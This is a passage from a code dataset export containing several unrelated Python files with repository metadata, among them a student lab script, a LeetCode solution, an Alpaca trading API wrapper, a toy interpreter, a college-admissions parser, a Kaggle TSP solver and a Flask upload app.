'gladiator',\n 'genre': 'action'\n\n },\n {\n 'title': 'interstellar',\n 'genre': 'science fiction'\n },\n ] \n }\n about_me['movies'].append({'title': 'tenet', 'genre': 'thriller'})\n name_id(about_me)\n print_pizza_toppings(about_me)\n add_pizza_toppings(about_me, ('PINEAPPLE', 'PEPPERONI'))\n print_pizza_toppings(about_me)\n print_movie_genres(about_me)\n print_movie_titles(about_me)\n\n# Function that prints Name and student number\ndef name_id(about_me):\n first_name = str.split(about_me['full_name'])\n print(f'My name is ', about_me['full_name'], end=', ') \n print(f'but you can call me King {first_name[0]}.')\n print('My student ID is', about_me['student_id'], end='.\\n')\n\n#Function that adds pizza toppings to data structure\ndef add_pizza_toppings(about_me, toppings):\n about_me['pizzatoppings'].extend(toppings)\n for i,t in enumerate(about_me['pizzatoppings']):\n about_me['pizzatoppings'][i] = t.lower() \n about_me['pizzatoppings'].sort()\n\n#Function that prints bullet list of pizza toppings\ndef print_pizza_toppings(about_me):\n print('\\nMy favourite pizza toppings are:')\n for t in about_me['pizzatoppings']:\n print(f'- {t}')\n\n#Function that prints comma-separated list of movie genres\ndef print_movie_genres(about_me):\n print('\\nI like to watch', end=' ')\n movie_genres = [g['genre'] for g in about_me['movies']]\n genre_list = ', '.join(movie_genres)\n x = str.split(genre_list)\n x.insert(-1, 'and')\n genre_list_edited = ' '.join((s) for s in x)\n print(genre_list_edited, end=' movies.\\n')\n \n#Function that prints comma-separated list of movie titles\ndef print_movie_titles(movie_list):\n print('\\nSome of my favourite movies are', end=' ')\n movie_titles = [g['title'].title() for g in movie_list['movies']]\n movies = ', '.join(movie_titles)\n x = str.split(movies)\n x.insert(-1, 'and')\n movies_edited = ' '.join((s)for s in x)\n print(movies_edited, end='!')\n\nif __name__ == '__main__':\n main()","repo_name":"Deryaus/COMP-593-Lab2","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74095840482","text":"# Given a binary tree, imagine yourself standing on the right side of it,\n# return the values of the nodes you can see ordered from top to bottom.\n#\n# For example:\n# Given the following binary tree,\n# 1 <---\n# / \\\n# 2 3 <---\n# \\ \\\n# 5 4 <---\n# You should return [1, 3, 4].\n#\n\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nimport collections\n\n\nclass Solution(object):\n def rightSideView(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n def helper(node, depth):\n if node:\n d[depth].append(node.val)\n helper(node.left, depth+1)\n helper(node.right, depth+1)\n d = collections.defaultdict(list)\n helper(root, 0)\n return [x[-1] for x in d.values()]","repo_name":"JadaHelloWorld/leedcode","sub_path":"2017_8_24/new/BinaryTreeRightSideView_199.py","file_name":"BinaryTreeRightSideView_199.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28878539371","text":"#!/usr/bin/env python \n#ryan g. coleman ryangc@mail.med.upenn.edu \n#usage: grab_pdb_chain.py file\n\n#grab system, string, regular expression, and operating system modules\nimport sys, string, re, os, math\nimport grab_pdb #for getCode function\nimport pdb #for chain sorting ease\n\ndef getCodeChain(pdbCode, chain):\n fileName = grab_pdb.getCode(pdbCode)\n pdbD = pdb.pdbData(fileName)\n newPdbD = pdbD.getOneChain(chain)\n newPdbD.write(pdbCode + \".\" + chain + \".pdb\")\n\ndef copyCode(pdbCode):\n fileName = grab_pdb.getCode(pdbCode)\n pdbD = pdb.pdbData(fileName)\n pdbD.write(pdbCode + \".-.pdb\")\n\nif -1 != string.find(sys.argv[0], \"grab_pdb_chain.py\"): \n list = open(sys.argv[1], 'r')\n linesList = list.readlines()\n list.close()\n for line in linesList:\n tokens = string.split(line)\n if len(tokens) == 1: \n code = string.strip(tokens[0])\n if len(code) == 4: #just pdb, no chain necessary\n copyCode(code)\n else:\n codePdb = code[:4]\n codeChain = code[4]\n getCodeChain(codePdb, codeChain)\n elif len(tokens) > 1:\n code = string.strip(tokens[0])\n chain = string.strip(tokens[1])\n getCodeChain(code, chain)\n\n\n","repo_name":"ryancoleman/tdt2014-part2","sub_path":"scripts/grab_pdb_chain.py","file_name":"grab_pdb_chain.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28345663950","text":"# API.py\n# Hold lists of api classes to use with application\n\nimport config as conf\nimport requests\nimport json\n\nclass BaseAPI:\n \"\"\"Base API Class\"\"\"\n\n def __init__(self, base_url, endpoint):\n self._API_BASE_URL = base_url\n self._ENDPOINT = endpoint\n\n def request(self, method, headers, params):\n url = self._API_BASE_URL + self._ENDPOINT\n\n response = None\n if headers == None and params == None:\n response = requests.request(method, url)\n elif headers == None and params != None:\n response = requests.request(method, url, params=params)\n elif headers != None and params == None:\n response = requests.request(method, url, headers=headers)\n else:\n response = requests.request(method, url, headers=headers, params=params)\n\n return response\n\n def get(self, headers=None, params=None):\n return self.request(\"GET\", headers, params)\n\n def request_json(self, method=\"GET\", headers=None, params=None):\n print(self, method, headers, params)\n\n response = self.request(method, headers, params)\n return json.loads(response.text)\n\n def get_json(self, headers=None, params=None):\n return self.request_json(\"GET\", headers, params)\n\nclass AlpacaAPI(BaseAPI):\n \"\"\"Base Alpaca API Class\"\"\"\n\n def __init__(self, api_key_id, api_key, base_url, endpoint):\n self._API_KEY_ID = api_key_id\n self._API_KEY = api_key\n super().__init__(base_url, endpoint)\n\n def request(self, method, params):\n headers = {\"APCA-API-KEY-ID\": self._API_KEY_ID, \"APCA-API-SECRET-KEY\": self._API_KEY}\n url = self._API_BASE_URL + self._ENDPOINT\n\n response = requests.request(method, url, headers=headers, params=params)\n\n return response\n\n def get(self, params=None):\n return self.request(\"GET\", params)\n\n def request_json(self, method=\"GET\", params=None):\n response = self.request(method, params)\n return json.loads(response.text)\n\n def get_json(self, params=None):\n return self.request_json(\"GET\", params)\n\n\nclass AlpacaPaperDataAPI(AlpacaAPI):\n \"\"\"Base Alpaca Paper API Class\"\"\"\n\n def __init__(self, endpoint):\n super().__init__(conf.ALPACA_PAPER_API_KEY_ID, conf.ALPACA_PAPER_API_SECRET_KEY, conf.ALPACA_BASE_DATA_URL, endpoint)\n\nclass AlpacaPaperTradingAPI(AlpacaAPI):\n \"\"\"Base Alpaca Paper API Class\"\"\"\n\n def __init__(self, endpoint):\n super().__init__(conf.ALPACA_PAPER_API_KEY_ID, conf.ALPACA_PAPER_API_SECRET_KEY, conf.ALPACA_PAPER_BASE_TRADING_URL, endpoint)\n\n def create_bracket_order(self, symbol, qty, entry, limit, take, stop):\n headers = {\"APCA-API-KEY-ID\": self._API_KEY_ID, \"APCA-API-SECRET-KEY\": self._API_KEY}\n url = self._API_BASE_URL + self._ENDPOINT\n data = {\n \"symbol\": symbol,\n \"qty\": qty,\n \"side\": \"buy\",\n \"type\": \"stop_limit\",\n \"time_in_force\": \"day\",\n \"stop_price\": entry,\n \"limit_price\": limit,\n \"order_class\": \"bracket\",\n \"take_profit\": {\n \"limit_price\": take\n },\n \"stop_loss\": {\n \"stop_price\": stop\n }\n }\n\n response = requests.post(url, json=data, headers=headers)\n\n return json.loads(response.content)\n","repo_name":"kkdelux/3BPTradingBot","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36855936122","text":"import altair as alt\nimport numpy as np\nimport pandas as pd\nimport streamlit as st\n\n\"\"\"\n# Welcome to Streamlit!\n\nEdit `/streamlit_app.py` to customize this app to your heart's desire :heart:.\nIf you have any questions, checkout our [documentation](https://docs.streamlit.io) and [community\nforums](https://discuss.streamlit.io).\n\nIn the meantime, below is an example of what you can do with just a few lines of code:\n\"\"\"\n\nnum_points = st.slider(\"Number of points in spiral\", 1, 10000, 1100)\nnum_turns = st.slider(\"Number of turns in spiral\", 1, 300, 31)\n\nindices = np.linspace(0, 1, num_points)\ntheta = 2 * np.pi * num_turns * indices\nradius = indices\n\nx = radius * np.cos(theta)\ny = radius * np.sin(theta)\n\ndf = pd.DataFrame({\n \"x\": x,\n \"y\": y,\n \"idx\": indices,\n \"rand\": np.random.randn(num_points),\n})\n\nst.altair_chart(alt.Chart(df, height=700, width=700)\n .mark_point(filled=True)\n .encode(\n x=alt.X(\"x\", axis=None),\n y=alt.Y(\"y\", axis=None),\n color=alt.Color(\"idx\", legend=None, scale=alt.Scale()),\n size=alt.Size(\"rand\", legend=None, scale=alt.Scale(range=[1, 150])),\n ))\n","repo_name":"panaverse/learn-generative-ai","sub_path":"11_containers/01_local/01_containers/xx_deploy_streamlit/streamlit-app/streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"54"} +{"seq_id":"20376431287","text":"# # Write your solution here\ndef run(program):\n variables = {chr(ord('A') + i): 0 for i in range(26)}\n output = []\n\n def get_value(val):\n if val.isdigit():\n return int(val)\n else:\n return variables[val]\n\n line = 0\n while line < len(program):\n command = program[line].split()\n if command[0] == 'PRINT':\n output.append(get_value(command[1]))\n elif command[0] == 'MOV':\n variables[command[1]] = get_value(command[2])\n elif command[0] == 'ADD':\n variables[command[1]] += get_value(command[2])\n elif command[0] == 'SUB':\n variables[command[1]] -= get_value(command[2])\n elif command[0] == 'MUL':\n variables[command[1]] *= get_value(command[2])\n elif command[0] == 'IF':\n condition = f\"{get_value(command[1])} {command[2]} {get_value(command[3])}\"\n if not eval(condition):\n line += 1\n elif command[0] == 'JUMP':\n line = program.index(f\"{command[1]}::\") - 1\n elif command[0] == 'END':\n break\n\n line += 1\n\n return output\n\nif __name__ == '__main__':\n program1 = [\n \"MOV A 1\",\n \"MOV B 2\",\n \"PRINT A\",\n \"PRINT B\",\n \"ADD A B\",\n \"PRINT A\",\n \"END\"\n ]\n result1 = run(program1)\n print(result1) \n\n program2 = [\n \"MOV A 1\",\n \"MOV B 10\",\n \"begin:\",\n \"IF A >= B JUMP quit\",\n \"PRINT A\",\n \"PRINT B\",\n \"ADD A 1\",\n \"SUB B 1\",\n \"JUMP begin\",\n \"quit:\",\n \"END\"\n ]\n result2 = run(program2)\n print(result2) \n\n program3 = [\n \"MOV A 1\",\n \"MOV B 1\",\n \"begin:\",\n \"PRINT A\",\n \"ADD B 1\",\n \"MUL A B\",\n \"IF B <= 10 JUMP begin\",\n \"END\"\n ]\n result3 = run(program3)\n print(result3) \n\n program4 = [\n \"MOV N 50\",\n \"PRINT 2\",\n \"MOV A 3\",\n \"begin:\",\n \"MOV B 2\",\n \"MOV Z 0\",\n \"test:\",\n \"MOV C B\",\n \"new:\",\n \"IF C == A JUMP error\",\n \"IF C > A JUMP over\",\n \"ADD C B\",\n \"JUMP new\",\n \"error:\",\n \"MOV Z 1\",\n \"JUMP over2\",\n \"over:\",\n \"ADD B 1\",\n \"IF B < A JUMP test\",\n \"over2:\",\n \"IF Z == 1 JUMP over3\",\n \"PRINT A\",\n \"over3:\",\n \"ADD A 1\",\n \"IF A <= N JUMP begin\",\n ]\n result4 = run(program4)\n print(result4) \n\n","repo_name":"Athooh/mooc-programming-23","sub_path":"part07-18_own_programming_language/src/own_language.py","file_name":"own_language.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32668520848","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 26 15:17:30 2020\n\n@author: trevor\n\"\"\"\nfrom segment.segment.segmenter import Analyzer\nimport csv\nt = Analyzer('anchor')\n\ninfile = 'data/output/domain_split_file.csv'\noutfile = 'data/output/final_df.csv'\nheaders = ['rank', 'domain', 'tld', 'registrar', 'whois_server', \n 'updated_date', 'creation_date', 'expiration_date', 'name_servers',\n 'dnssec', 'org', 'city', 'state', 'zipcode', 'country', 'trust',\n 'dom_split'] \n\ndef create_reader_writer(infile=infile, outfile=outfile):\n reader = csv.DictReader(infile)\n writer = csv.DictWriter(outfile, headers, extrasaction='ignore')\n return reader, writer\n\ndef split_domain(domain): return t.segment(domain)\n\ndef main(): \n with open(infile, 'r+') as inp, open(outfile, 'w+') as out:\n reader, writer = create_reader_writer(inp, out) \n writer.writeheader()\n for line in reader:\n domain = line['domain']\n print('Checking...{}'.format(domain))\n dom_split = split_domain(domain)\n line['dom_split'] = dom_split\n writer.writerow(line)\n \nmain()\n\n","repo_name":"tmcglynn01/disinformation","sub_path":"scripts/domain_split.py","file_name":"domain_split.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26331042180","text":"# Estimate how much disk space is needed to store all comment data\n\nfrom html.parser import HTMLParser\nimport re\nimport requests\n\nclass MyHTMLParser(HTMLParser):\n\n\tdef handle_data(self, data):\n\t\tif (re.match('\\d{1,3}(,\\d{1,3})+', data)):\n\t\t\tsize = int(''.join(data.split(',')))\n\t\t\tglobal total_size\n\t\t\ttotal_size += size\n\nif __name__ == \"__main__\":\n\ttotal_size = 0\n\treddit_comments_data = 'http://files.pushshift.io/reddit/comments/'\n\thtml = requests.get(reddit_comments_data).content\n\tparser = MyHTMLParser()\n\tparser.feed(str(html))\n\tprint('total size of bz2 compressed reddit comment data: {0:.2f}G'.format(total_size / (10**9)))\n","repo_name":"mmxmb/reddit_comments_chatbot","sub_path":"misc/get_dump_size.py","file_name":"get_dump_size.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71669070242","text":"import re\n\n\ndef set_format(fall_datas, admission):\n for fall_data in fall_datas:\n data_type = fall_data[\"type\"]\n data = fall_data[\"data\"]\n title = data.get(\"title\", None)\n\n if data_type == \"NestedTitleValue\":\n top_title = data[\"topTitleValue\"]\n title = top_title[\"title\"]\n\n if title == \"Overall Admission Rate\":\n percentage, num, pre_num = get_per_and_num_and_pre_num(top_title[\"value\"][0])\n\n admission.update({\n \"acceptance_pct_overall\": percentage,\n \"applicant_overall_count\": num\n })\n\n for child in data[\"children\"]:\n if child[\"title\"] == \"Women\":\n p, n, pn = get_per_and_num_and_pre_num(child[\"value\"][0])\n\n admission.update({\n \"acceptance_pct_w\": p,\n \"applicant_w_count\": n\n })\n elif child[\"title\"] == \"Men\":\n p, n, pn = get_per_and_num_and_pre_num(child[\"value\"][0])\n\n admission.update({\n \"acceptance_pct_m\": p,\n \"applicant_m_count\": n\n })\n elif title == \"Students Enrolled\":\n sp, sn, spn = get_per_and_num_and_pre_num(top_title[\"value\"][0])\n\n admission.update({\n \"yield_pct_overall\": sp,\n \"admitted_overall_count\": sn,\n \"enrolled_overall_count\": spn\n })\n\n for child in data[\"children\"]:\n if child[\"title\"] == \"Women\":\n p, n, pn = get_per_and_num_and_pre_num(child[\"value\"][0])\n\n admission.update({\n \"enrolled_w_count\": pn,\n \"yield_pct_w\": p,\n \"admitted_w_count\": n\n })\n elif child[\"title\"] == \"Men\":\n p, n, pn = get_per_and_num_and_pre_num(child[\"value\"][0])\n\n admission.update({\n \"enrolled_m_count\": pn,\n \"yield_pct_m\": p,\n \"admitted_m_count\": n\n })\n elif title == \"Students Offered Wait List\":\n admission.update({\n \"waitlist_offered_count\": int(data[\"value\"][0].replace(\",\", \"\"))\n })\n elif title == \"Students Accepting Wait List Position\":\n admission.update({\n \"waitlist_accepted_count\": int(data[\"value\"][0].replace(\",\", \"\"))\n })\n elif title == \"Students Admitted From Wait List\":\n admission.update({\n \"waitlist_admitted_count\": int(data[\"value\"][0].replace(\",\", \"\"))\n })\n elif data_type == \"BarGraph\":\n if title == \"\":\n for grade in data[\"data\"]:\n if grade[\"label\"] == \"3.75 and Above\":\n admission.update({\n \"gpa375_pct\": grade[\"value\"]\n })\n elif grade[\"label\"] == \"3.50 - 3.74\":\n admission.update({\n \"gpa350_pct\": grade[\"value\"]\n })\n elif grade[\"label\"] == \"3.25 - 3.49\":\n admission.update({\n \"gpa325_pct\": grade[\"value\"]\n })\n elif grade[\"label\"] == \"3.00 - 3.24\":\n admission.update({\n \"gpa300_pct\": grade[\"value\"]\n })\n elif grade[\"label\"] == \"2.50 - 2.99\":\n admission.update({\n \"gpa250_pct\": grade[\"value\"]\n })\n elif grade[\"label\"] == \"2.00 - 2.49\":\n admission.update({\n \"gpa200_pct\": grade[\"value\"]\n })\n elif \"SAT Math\" in title:\n a, n, x = get_average_and_range(title)\n\n admission.update({\n \"avg_sat_math\": a,\n \"avg_sat_math_min\": n,\n \"avg_sat_math_max\": x\n })\n\n for level in data[\"data\"]:\n label = level[\"label\"]\n\n if \"700 - 800\" in label:\n admission.update({\n \"sat_math700_pct\": level[\"value\"]\n })\n elif \"600 - 700\" in label:\n admission.update({\n \"sat_math600_pct\": level[\"value\"]\n })\n elif \"500 - 600\" in label:\n admission.update({\n \"sat_math500_pct\": level[\"value\"]\n })\n elif \"400 - 500\" in label:\n admission.update({\n \"sat_math400_pct\": level[\"value\"]\n })\n elif \"300 - 400\" in label:\n admission.update({\n \"sat_math300_pct\": level[\"value\"]\n })\n elif \"200 - 300\" in label:\n admission.update({\n \"sat_math200_pct\": level[\"value\"]\n })\n elif \"SAT EBRW\" in title:\n a, n, x = get_average_and_range(title)\n\n admission.update({\n \"avg_sat_e\": a,\n \"avg_sat_english_min\": n,\n \"avg_sat_english_max\": x\n })\n\n for level in data[\"data\"]:\n label = level[\"label\"]\n\n if \"700 - 800\" in label:\n admission.update({\n \"sat_english700_pct\": level[\"value\"]\n })\n elif \"600 - 700\" in label:\n admission.update({\n \"sat_english600_pct\": level[\"value\"]\n })\n elif \"500 - 600\" in label:\n admission.update({\n \"sat_english500_pct\": level[\"value\"]\n })\n elif \"400 - 500\" in label:\n admission.update({\n \"sat_english400_pct\": level[\"value\"]\n })\n elif \"300 - 400\" in label:\n admission.update({\n \"sat_english300_pct\": level[\"value\"]\n })\n elif \"200 - 300\" in label:\n admission.update({\n \"sat_english200_pct\": level[\"value\"]\n })\n else:\n a, n, x = get_average_and_range(title)\n\n admission.update({\n \"avg_act\": a,\n \"avg_act_min\": n,\n \"avg_act_max\": x\n })\n\n for level in data[\"data\"]:\n label = level[\"label\"]\n\n if \"36\" in label:\n admission.update({\n \"avg_act30_pct\": level[\"value\"]\n })\n elif \"29\" in label:\n admission.update({\n \"avg_act24_pct\": level[\"value\"]\n })\n elif \"23\" in label:\n admission.update({\n \"avg_act18_pct\": level[\"value\"]\n })\n elif \"17\" in label:\n admission.update({\n \"avg_act12_pct\": level[\"value\"]\n })\n elif \"11\" in label:\n admission.update({\n \"avg_act6_pct\": level[\"value\"]\n })\n else:\n admission.update({\n \"avg_act0_pct\": level[\"value\"]\n })\n elif title == \"High School Class Rank\":\n for level in data[\"value\"]:\n pct_pattern = r\"[0-9]+(?=\\%)\"\n if re.search(pct_pattern, level) is not None:\n pct = int(re.search(pct_pattern, level).group())\n else:\n pct = None\n\n if \"tenth\" in level:\n admission.update({\n \"hs_rank_10_pct\": pct\n })\n elif \"quarter\" in level:\n admission.update({\n \"hs_rank_25_pct\": pct\n })\n else:\n admission.update({\n \"hs_rank_50_pct\": pct\n })\n elif title == \"National Merit Scholar\":\n admission.update({\n \"national_merit_pct\": get_percent_in_no_reported(data[\"value\"][0])\n })\n elif title == \"Valedictorian\":\n admission.update({\n \"valedictorian_pct\": get_percent_in_no_reported(data[\"value\"][0])\n })\n elif title == \"Class President\":\n admission.update({\n \"class_president_pct\": get_percent_in_no_reported(data[\"value\"][0])\n })\n elif title == \"Student Government Officer\":\n admission.update({\n \"student_gov_pct\": get_percent_in_no_reported(data[\"value\"][0])\n })\n\n\ndef get_per_and_num_and_pre_num(string):\n string = string.replace(\" \", \"\").replace(\",\", \"\")\n per_pattern = r\"[0-9]+(?=\\%)\"\n if re.search(per_pattern, string) is not None:\n percentage = int(re.search(per_pattern, string).group())\n else:\n percentage = None\n\n num_pattern = r\"(?<=of)[0-9]+\"\n if re.search(num_pattern, string) is not None:\n num = int(re.search(num_pattern, string).group().replace(',', ''))\n else:\n num = None\n\n pre_num_pattern = r\"[0-9,]+(?=\\([0-9]+%\\))\"\n if re.search(pre_num_pattern, string) is not None:\n pre_num = int(re.search(pre_num_pattern, string).group().replace(',', ''))\n else:\n pre_num = None\n\n return percentage, num, pre_num\n\n\ndef get_average_and_range(string):\n avg_pattern = r\"[0-9]+(?=\\saverage)\"\n if re.search(avg_pattern, string) is not None:\n avg = int(re.search(avg_pattern, string).group())\n else:\n avg = None\n\n range_pattern = r\"[0-9]{3}\\-[0-9]{3}\"\n if re.search(range_pattern, string) is not None:\n rang = re.search(range_pattern, string).group().split(\"-\")\n mini = int(rang[0])\n maxi = int(rang[1])\n else:\n mini = None\n maxi = None\n \n return avg, mini, maxi\n\n\ndef get_percent_in_no_reported(string):\n pattern = r\"[0-9]{1,3}(?=\\%)\"\n if re.search(pattern, string) is not None:\n return re.search(pattern, string).group()\n else:\n return 0\n","repo_name":"balcen/college-crawler","sub_path":"admission/profile_of_fall_admission.py","file_name":"profile_of_fall_admission.py","file_ext":"py","file_size_in_byte":11242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"69806433123","text":"from setuptools import setup, find_packages\n\ndescription = \\\n\"\"\"A multi-wavelength SED model based on radiative transfer simulations and\ndeep learning\"\"\"\n\ninstall_requires = [\n 'astropy>=3',\n 'numpy>=1.17',\n 'astro-sedpy>=0.2',\n 'torch>=1.9',\n 'tqdm',\n]\n\n# Get version\nexec(open('starduster/version.py', 'r').read())\n\nsetup(\n name='starduster',\n version=__version__,\n author=\"Yisheng Qiu\",\n author_email=\"hpc_yqiuu@163.com\",\n description=description,\n license=\"GPLv3\",\n url='https://github.com/yqiuu/starduster',\n install_requires=install_requires,\n packages=find_packages(),\n include_package_data=True,\n)\n","repo_name":"rseng/rsepedia-analysis","sub_path":"_repos/github/yqiuu/starduster/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"11185354955","text":"import pyaudio\nimport wave\nimport os\nfrom output import Output\nfrom settings import SAMPLE_RATE, SAMPLE_WIDTH, BUFFER_SIZE\nfrom mixer import MonoMixer, PolyMixer\nfrom tkinter import *\nfrom keys import map_keys\nfrom presets import *\n\n\nos.system('xset r off')\n\np = pyaudio.PyAudio()\nmixer = MonoMixer(SMOOTH)\nmixer.controller.portamento.value = 100.0\nout = Output(mixer)\n\ntk_root = Tk()\nmap_keys(tk_root, mixer.controller)\n\nsave_wav = True\n\nif save_wav:\n file = wave.open('output.wav', 'wb')\n file.setframerate(SAMPLE_RATE)\n file.setsampwidth(SAMPLE_WIDTH)\n file.setnchannels(1)\n\n\ndef callback(input_data, frame_count, time_info, status):\n data = out.get_chunk(frame_count)\n if save_wav:\n file.writeframes(data)\n return data, pyaudio.paContinue\n\n\nstream = p.open(format=p.get_format_from_width(SAMPLE_WIDTH),\n channels=1,\n rate=SAMPLE_RATE,\n frames_per_buffer=BUFFER_SIZE,\n output=True,\n stream_callback=callback,\n )\n\nstream.start_stream()\ntk_root.mainloop()\n\n\n\n#while stream.is_active():\n# pitch = float(input(\"...\"))\n# mixer.note_on(100, pitch)\n# input(\"...\")\n# mixer.note_off()\n\n\nstream.stop_stream()\nstream.close()\nos.system('xset r on')\n\nif save_wav:\n file.close()\n\np.terminate()\n","repo_name":"ieaalto/Mokkihoperyys","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2581634745","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport csv\nimport sklearn.cluster as skcluster\nfrom functools import partial\nfrom collections import Counter\nfrom concorde.tsp import TSPSolver\nimport operator\nfrom itertools import islice\n\ndef is_prime(limit):\n limitn = limit\n not_prime = set()\n primes = [0,0]\n\n for i in range(2, limitn):\n if i in not_prime:\n primes.append(0)\n continue\n\n for f in range(i*2, limitn, i):\n not_prime.add(f)\n\n primes.append(1)\n\n return np.array(primes)\n \ndef make_submission(filename, path):\n with open(filename, 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['Path'])\n writer.writerows([p] for p in path)\n \ndef load_csv(filename, limit=None):\n with open(filename, newline='') as input_file:\n reader = csv.reader(input_file)\n next(reader) #Skip headers\n it = islice(reader, limit) if limit else reader\n return np.array([[float(x)*1000, float(y)*1000] for _, x, y in it])\n \ndef scoring_function(data):\n penalized = is_prime(len(data))\n coords = (data[:,0] + 1j * data[:,1])\n def score_path(path):\n dist = np.abs(np.diff(coords[path]))\n penalty = 0.1 * np.sum(dist[9::10] * penalized[path[9:-1:10]])\n dist = np.sum(dist)\n return dist + penalty\n return score_path\n\ndef estimate_edges(k, samples): \n \"Estimate the number of edges for k clusters of the data\"\n per_cluster = samples // k\n if per_cluster == 1:\n return k**2\n return per_cluster ** 2 * k + (2*k+1)**2\n \ndef cluster_data(data, n_clusters, min_nodes=1):\n nodes = 0\n while nodes < min_nodes: \n clusterer = skcluster.MiniBatchKMeans(n_clusters= n_clusters, init_size= n_clusters*3)\n labels =clusterer.fit_predict(data)\n nodes = min(Counter(labels).values())\n centroids = clusterer.cluster_centers_\n return labels, centroids\n \ndef concorde_solve(nodes, norm='EUC_2D', **kwargs):\n return TSPSolver.from_data(*nodes.T, norm=norm).solve(**kwargs)\n \n\n#Test run on fewer cities, set to None to use all data\nlimit = None\nmain_time_limit = 300\nclusters_time_limit = 60\n\n#Load data\ndata = load_csv('../input/cities.csv', limit=limit)\n \nm = len(data)\nscore_path = scoring_function(data)\nindices = np.arange(m)\n\nestimate_edges = partial(estimate_edges, samples = m)\n\n#Compute k such that the number of edges between cities is minimized\nn_clusters = sorted(range(1,m//2), key= estimate_edges)[0]\nprint(f\"number of clusters: {n_clusters}, expected edges: {estimate_edges(n_clusters):,d}\")\n\n#Cluster the data into n_clusters using MiniBatchKmeans, make sure each clustr has at least 10 cities\nlabels, centroids = cluster_data(data[1:], n_clusters, min_nodes=1)\nlabels = np.insert(labels+1, 0, 0, axis=0)\ncentroids = np.insert(centroids, 0, data[0], axis=0)\n\nprint(len(centroids))\nprint('Solving TSP for main tour')\nconcorde_sol = concorde_solve(centroids, time_bound=main_time_limit)\nassert concorde_sol.found_tour\ntour = concorde_sol.tour\n\npath = [0]\n\nfor i, cluster_idx in enumerate(tour[1:],1):\n print(f'{i} of {n_clusters}: Solving tsp for cluster {cluster_idx}')\n cluster = data[labels==cluster_idx]\n sort = sorted(range(len(cluster)), key=lambda n: (cluster[n][0], cluster[n][1]))\n cluster = cluster[sort]\n idx = indices[labels==cluster_idx][sort]\n \n solution = concorde_solve(cluster, time_bound=clusters_time_limit)\n assert solution.found_tour\n cluster_tour = solution.tour\n path.extend(idx[cluster_tour])\n \npath.append(0)\n\n# Make sure every city is visited once (except for the north pole)\nassert len(set(path)) == len(data)\nscore = score_path(path) / 1000\n\nmake_submission('submission.csv', path)\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/traveling-santa-2018-prime-paths/gab/batched-santa.py","file_name":"batched-santa.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"33133839671","text":"import os\nimport json\nfrom datetime import datetime\nfrom flask import render_template, flash, redirect, url_for, request, g, \\\n jsonify, current_app\nfrom app.main.forms import FacebookChatUpload\nfrom app.main import bp\nfrom app.classes import Person, Reaction, ReactCounter\nfrom app.helper import react_classifier, react_compare, react_chart_row_filler\nfrom werkzeug.utils import secure_filename\nimport boto3\n\n\n@bp.route('/', methods=['GET', 'POST'])\n@bp.route('/home', methods=['GET', 'POST'])\ndef home():\n # s3 = boto3.client(\n # \"s3\",\n # aws_access_key_id=current_app.config['ACCESS_KEY'],\n # aws_secret_access_key=current_app.config['SECRET_ACCESS_KEY']\n # )\n # bucket_resource = s3\n form = FacebookChatUpload()\n if form.validate_on_submit():\n filenames = []\n names = request.files.getlist(form.json_facebook_file.name)\n for file in form.json_facebook_file.data:\n # kicks out if files is not json (very weak)\n if 'json'not in str(file.filename):\n return redirect(url_for('main.readme'))\n file_names = secure_filename(file.filename)\n bleh = file.stream.read()\n stringbleh = bleh.decode(\"utf-8\")\n print(os.path.join(current_app.config['UPLOAD_FOLDER'], file_names))\n with open(os.path.join(current_app.config['UPLOAD_FOLDER'], file_names), 'w') as json_file:\n json.dump(stringbleh, json_file)\n # bucket_resource.upload_file(\n # Bucket=current_app.config['FLASKS3_BUCKET_NAME'],\n # Filename=os.path.join(current_app.config['UPLOAD_FOLDER'], file_names),\n # Key=str(current_app.config['RANDOM_DIRECTORY'])+'/'+file_names\n # )\n\n return redirect(url_for('main.results'))\n return render_template('home.html', title='Home', form=form)\n\n\n@bp.route('/readme', methods=['GET', 'POST'])\ndef readme():\n return render_template('readme.html', title='How to Use')\n\n\n@bp.route('/results', methods=['GET', 'POST'])\ndef results():\n list_of_people = []\n list_results = []\n messages = None\n messages = []\n react_types = ['thumbs_up', 'angry', 'wow', 'laugh', 'cry', 'heart']\n\n for filename in 